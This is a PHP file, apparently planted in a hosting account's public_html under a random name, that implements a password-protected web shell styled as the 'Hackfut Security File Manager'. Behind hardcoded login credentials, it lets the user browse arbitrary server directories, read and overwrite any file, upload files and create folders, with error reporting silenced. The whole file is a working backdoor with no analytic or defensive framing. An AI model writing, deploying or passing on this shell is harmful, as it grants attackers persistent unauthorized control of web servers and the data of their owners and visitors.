File: /home/crossp22/public_html/karma_syndicate_78gl96zwm4.php
<?php
@ini_set('display_errors', 0);
@set_time_limit(0);
error_reporting(0);
// Authentication credentials
$correct_username = 'Hackfut';
$correct_password = 'HFT404.#';
// Check authentication
session_start();
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
if (isset($_POST['username']) && isset($_POST['password'])) {
if ($_POST['username'] === $correct_username && $_POST['password'] === $correct_password) {
$_SESSION['authenticated'] = true;
} else {
$error = "Invalid credentials!";
}
}
if (!isset($_SESSION['authenticated']) || $_SESSION['authenticated'] !== true) {
echo '<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Authentication Required</title>
<style>
body { background: #0a0a0a; font-family: monospace; color: #fff; }
.login-box {
background: #111;
border: 1px solid #333;
padding: 30px;
width: 300px;
margin: 100px auto;
border-radius: 5px;
}
input {
width: 100%;
padding: 10px;
margin: 10px 0;
background: #222;
border: 1px solid #444;
color: #0f0;
}
button {
width: 100%;
padding: 10px;
background: #0088cc;
border: none;
color: white;
cursor: pointer;
}
.error { color: #ff4444; margin: 10px 0; }
h2 { text-align: center; color: #0088cc; margin-top: 0; }
</style>
</head>
<body>
<div class="login-box">
<h2>🔐 Authentication Required</h2>';
if (isset($error)) echo '<div class="error">'.$error.'</div>';
echo '<form method="POST">
<input type="text" name="username" placeholder="Username" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Login</button>
</form>
</div>
</body>
</html>';
exit();
}
}
function safe($s) {
return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
function formatSize($bytes) {
$units = ['B','KB','MB','GB','TB'];
for ($i = 0; $bytes >= 1024 && $i < count($units)-1; $i++) {
$bytes /= 1024;
}
return round($bytes, 2).' '.$units[$i];
}
$cwd = isset($_GET['path']) ? $_GET['path'] : getcwd();
$cwd = realpath($cwd);
// Handle upload
if (isset($_POST['upload']) && isset($_FILES['file'])) {
$target = $cwd . '/' . basename($_FILES['file']['name']);
if (@move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
echo "<div style='color:#0f0'>[+] File uploaded successfully.</div>";
} else {
echo "<div style='color:#f00'>[-] Upload failed.</div>";
}
}
// Handle file edit save
if (isset($_POST['save']) && isset($_POST['filename'])) {
$path = $cwd.'/'.basename($_POST['filename']);
if (@file_put_contents($path, $_POST['content']) !== false) {
echo "<div style='color:#0f0'>[+] File saved successfully.</div>";
} else {
echo "<div style='color:#f00'>[-] Failed to save file.</div>";
}
}
// Handle create directory
if (isset($_POST['mkdir']) && isset($_POST['dirname'])) {
$dirName = basename($_POST['dirname']);
$fullPath = $cwd . '/' . $dirName;
if (!file_exists($fullPath)) {
if (@mkdir($fullPath)) {
echo "<div style='color:#0f0'>[+] Directory created.</div>";
} else {
echo "<div style='color:#f00'>[-] Failed to create directory.</div>";
}
} else {
echo "<div style='color:#f90'>[!] Directory already exists.</div>";
}
}
echo "<!DOCTYPE html><html lang='en'><head><meta charset='UTF-8'><title>File Manager</title><style>
body { background:#0d0d0d; color:#ccc; font-family:monospace; padding:20px; }
a { color:#5af; text-decoration:none; }
a:hover { text-decoration:underline; }
input, textarea, select { background:#111; color:#0f0; border:1px solid #444; padding:5px; width:100%; }
input[type=submit] { background:#222; color:#0f0; border:1px solid #0f0; cursor:pointer; }
hr { border:none; border-top:1px solid #333; margin:20px 0; }
.dir { color:#0ff; }
.file { color:#fff; }
.size { color:#999; float:right; }
h2 { margin:0 0 10px 0; }
.logout { float:right; background:#cc3300; color:white; padding:5px 10px; text-decoration:none; }
</style></head><body>";
echo "<a href='?logout' class='logout'>Logout</a>";
echo "<h2>Hackfut Security File Manager</h2>";
echo "<b>Current Path:</b> ".safe($cwd)."<hr>";
// Logout
if (isset($_GET['logout'])) {
session_destroy();
header('Location: '.$_SERVER['PHP_SELF']);
exit();
}
// Show navigation
$parts = explode(DIRECTORY_SEPARATOR, $cwd);
$nav = "";
$build = "";
foreach ($parts as $p) {
if ($p == "") continue;
$build .= "/$p";
$nav .= "<a href='?path=".urlencode($build)."'>".safe($p)."</a> / ";
}
echo $nav."<hr>";
// File listing
$files = @scandir($cwd);
echo "<ul style='list-style:none;padding:0;'>";
foreach ($files as $f) {
if ($f == ".") continue;
$fp = $cwd.'/'.$f;
if (is_dir($fp)) {
echo "<li class='dir'>📁 <a href='?path=".urlencode($fp)."'>".safe($f)."</a></li>";
} else {
echo "<li class='file'>📄 <a href='?path=".urlencode($cwd)."&edit=".urlencode($f)."'>".safe($f)."</a><span class='size'>(".formatSize(filesize($fp)).")</span></li>";
}
}
echo "</ul><hr>";
// Edit file
if (isset($_GET['edit'])) {
$file = basename($_GET['edit']);
$full = $cwd.'/'.$file;
if (file_exists($full)) {
$content = @file_get_contents($full);
echo "<h3>Editing: ".safe($file)."</h3>";
echo "<form method='post'>";
echo "<input type='hidden' name='filename' value='".safe($file)."'>";
echo "<textarea name='content' rows='15'>".safe($content)."</textarea><br>";
echo "<input type='submit' name='save' value='Save File'>";
echo "</form><hr>";
}
}
// Upload
echo "<h3>Upload File</h3>";
echo "<form method='post' enctype='multipart/form-data'>";
echo "<input type='file' name='file'><br>";
echo "<input type='submit' name='upload' value='Upload'>";
echo "</form><hr>";
// Create folder
echo "<h3>Create Folder</h3>";
echo "<form method='post'>";
echo "<input type='text' name='dirname' placeholder='New folder name'>";
echo "<input type='submit' name='mkdir' value='Create'>";
echo "</form>";
echo "</body></html>";